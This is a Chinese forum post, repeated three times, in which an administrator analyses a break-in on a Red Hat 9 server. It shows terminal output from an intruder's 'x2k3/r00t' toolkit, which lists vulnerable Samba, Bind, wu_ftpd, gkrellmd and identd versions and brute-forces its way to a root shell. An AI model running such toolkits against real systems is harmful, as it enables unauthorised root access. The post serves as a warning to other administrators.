查看: 500|回复: 3

默认Samba版本在RedHat 9上的溢出获取root

 关闭 [复制链接]

该用户从未签到

发表于 2009-10-16 22:49 | 显示全部楼层 |阅读模式
从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑

Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

提升为root,只需要短短的3秒钟

自己汗一个

从服务器的tmp查找到一个x2k3的目录

[bob@learnin9 tmp]$ cd x2k3/
[bob@learnin9 x2k3]$ ls
bind ftp gkr identd r00t samba
[bob@learnin9 x2k3]$

bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

[bob@learnin9 x2k3]$ ./r00t
.--------------------------------.
| x2k3 /
| Written by Natok /
+------------------------+----.
| Targets: [1] Samba | <= 2.2.8
| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1
| [3] gkrellmd | <2.1.12
| [4] wu_ftpd | <=2.6.1
| [5] identd | 1.2
+------------------------+----.
| http://www.natok.de /
|____________________________/

./r00t
[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
  • Range to scan : 127.0.0.0
  • Socket Connecting to port : 139
  • Press control+c for skipping !
    Port 139 IP 127.0.0.0 -> Connection refused!
    Port 139 IP 127.0.0.1 -> Connection ok!
    [+] Let’s sploit ;-)
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Host is running samba.
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Using ret: [0xbffff6a0]
    + Using ret: [0xbffff574]

    + Using ret: [0xbffff448]
    + Using ret: [0xbffff31c]
    + Using ret: [0xbffff1f0]
    + Using ret: [0xbffff0c4]
    + Using ret: [0xbfffef98]
    + Using ret: [0xbfffee6c]

    + Using ret: [0xbfffed40]
    + Using ret: [0xbfffec14]
    + Using ret: [0xbfffeae8]
    + Using ret: [0xbfffe9bc]
    + Using ret: [0xbfffe890]
    + Using ret: [0xbfffe764]
    + Using ret: [0xbfffe638]
    + Using ret: [0xbfffe50c]
    + Using ret: [0xbfffe3e0]
    + Using ret: [0xbfffe2b4]
    + Using ret: [0xbfffe188]
    + Worked!
    --------------------------------------------------------------
    *** JE MOET JE MUIL HOUWE
    Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)
    id
    uid=0(root) gid=0(root) groups=99(nobody)

    看到了吧。就这么轻易的被夺取为root了。
    我这只是localhost方式,其实远程也是一样的直接获取为root了。
    请各位好好看看自己的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了?
    还有bind gkrellmd wu_ftpd identd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵!

    我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,而且还是在公网上,所以那个黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的工具。

    自己欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,究竟里面是谁?很好奇.........

    可以说,r00t程序是Natok写的,但是exploit程序不是他写的,他只是将其它的溢出程序分门别类的。做了个友好的界面,不过能搜集到还是很强的
  • PCOS系统下载站:http://zhuangji.wang

    该用户从未签到

     楼主| 发表于 2009-10-17 18:10 | 显示全部楼层
    沙发,自己做..
    PCOS系统下载站:http://zhuangji.wang

    该用户从未签到

     楼主| 发表于 2009-10-16 22:49 | 显示全部楼层

    默认Samba版本在RedHat 9上的溢出获取root

    从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

    这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑

    Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

    提升为root,只需要短短的3秒钟

    自己汗一个

    从服务器的tmp查找到一个x2k3的目录

    [bob@learnin9 tmp]$ cd x2k3/
    [bob@learnin9 x2k3]$ ls
    bind ftp gkr identd r00t samba
    [bob@learnin9 x2k3]$

    bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

    [bob@learnin9 x2k3]$ ./r00t
    .--------------------------------.
    | x2k3 /
    | Written by Natok /
    +------------------------+----.
    | Targets: [1] Samba | <= 2.2.8
    | [2] Bind | 8.3.2 / 8.3.3 / 9.2.1
    | [3] gkrellmd | <2.1.12
    | [4] wu_ftpd | <=2.6.1
    | [5] identd | 1.2
    +------------------------+----.
    | http://www.natok.de /
    |____________________________/

    ./r00t
    [bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
  • Range to scan : 127.0.0.0
  • Socket Connecting to port : 139
  • Press control+c for skipping !
    Port 139 IP 127.0.0.0 -> Connection refused!
    Port 139 IP 127.0.0.1 -> Connection ok!
    [+] Let’s sploit ;-)
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Host is running samba.
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Using ret: [0xbffff6a0]
    + Using ret: [0xbffff574]

    + Using ret: [0xbffff448]
    + Using ret: [0xbffff31c]
    + Using ret: [0xbffff1f0]
    + Using ret: [0xbffff0c4]
    + Using ret: [0xbfffef98]
    + Using ret: [0xbfffee6c]

    + Using ret: [0xbfffed40]
    + Using ret: [0xbfffec14]
    + Using ret: [0xbfffeae8]
    + Using ret: [0xbfffe9bc]
    + Using ret: [0xbfffe890]
    + Using ret: [0xbfffe764]
    + Using ret: [0xbfffe638]
    + Using ret: [0xbfffe50c]
    + Using ret: [0xbfffe3e0]
    + Using ret: [0xbfffe2b4]
    + Using ret: [0xbfffe188]
    + Worked!
    --------------------------------------------------------------
    *** JE MOET JE MUIL HOUWE
    Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)
    id
    uid=0(root) gid=0(root) groups=99(nobody)

    看到了吧。就这么轻易的被夺取为root了。
    我这只是localhost方式,其实远程也是一样的直接获取为root了。
    请各位好好看看自己的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了?
    还有bind gkrellmd wu_ftpd identd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵!

    我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,而且还是在公网上,所以那个黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的工具。

    自己欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,究竟里面是谁?很好奇.........

    可以说,r00t程序是Natok写的,但是exploit程序不是他写的,他只是将其它的溢出程序分门别类的。做了个友好的界面,不过能搜集到还是很强的
  • PCOS系统下载站:http://zhuangji.wang

    该用户从未签到

     楼主| 发表于 2009-10-16 22:49 | 显示全部楼层

    默认Samba版本在RedHat 9上的溢出获取root

    从近日对被黑服务器的安全分析来看,我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

    这几天服务器因为要放到公网测试,此时又安装了Samba服务器。结果第二天就发现了服务器被黑

    Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

    提升为root,只需要短短的3秒钟

    自己汗一个

    从服务器的tmp查找到一个x2k3的目录

    [bob@learnin9 tmp]$ cd x2k3/
    [bob@learnin9 x2k3]$ ls
    bind ftp gkr identd r00t samba
    [bob@learnin9 x2k3]$

    bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

    [bob@learnin9 x2k3]$ ./r00t
    .--------------------------------.
    | x2k3 /
    | Written by Natok /
    +------------------------+----.
    | Targets: [1] Samba | <= 2.2.8
    | [2] Bind | 8.3.2 / 8.3.3 / 9.2.1
    | [3] gkrellmd | <2.1.12
    | [4] wu_ftpd | <=2.6.1
    | [5] identd | 1.2
    +------------------------+----.
    | http://www.natok.de /
    |____________________________/

    ./r00t
    [bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
  • Range to scan : 127.0.0.0
  • Socket Connecting to port : 139
  • Press control+c for skipping !
    Port 139 IP 127.0.0.0 -> Connection refused!
    Port 139 IP 127.0.0.1 -> Connection ok!
    [+] Let’s sploit ;-)
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Host is running samba.
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Using ret: [0xbffff6a0]
    + Using ret: [0xbffff574]

    + Using ret: [0xbffff448]
    + Using ret: [0xbffff31c]
    + Using ret: [0xbffff1f0]
    + Using ret: [0xbffff0c4]
    + Using ret: [0xbfffef98]
    + Using ret: [0xbfffee6c]

    + Using ret: [0xbfffed40]
    + Using ret: [0xbfffec14]
    + Using ret: [0xbfffeae8]
    + Using ret: [0xbfffe9bc]
    + Using ret: [0xbfffe890]
    + Using ret: [0xbfffe764]
    + Using ret: [0xbfffe638]
    + Using ret: [0xbfffe50c]
    + Using ret: [0xbfffe3e0]
    + Using ret: [0xbfffe2b4]
    + Using ret: [0xbfffe188]
    + Worked!
    --------------------------------------------------------------
    *** JE MOET JE MUIL HOUWE
    Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)
    id
    uid=0(root) gid=0(root) groups=99(nobody)

    看到了吧。就这么轻易的被夺取为root了。
    我这只是localhost方式,其实远程也是一样的直接获取为root了。
    请各位好好看看自己的Redhat 9吧。rpm -qa |grep ***** 是不是汗已经出来了?
    还有bind gkrellmd wu_ftpd identd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵!

    我的服务器因为没有启动Bind、gkrellmd、wu_ftpd 、identd,只启动了默认安装的samba,而且还是在公网上,所以那个黑客就中奖入侵到我的服务器了。可喜可贺,我也是终于找到了这么好的工具。

    自己欢喜一下。去看了一下http://www.natok.de/ 居然发现是中文的网站,究竟里面是谁?很好奇.........

    可以说,r00t程序是Natok写的,但是exploit程序不是他写的,他只是将其它的溢出程序分门别类的。做了个友好的界面,不过能搜集到还是很强的
  • PCOS系统下载站:http://zhuangji.wang

    本版积分规则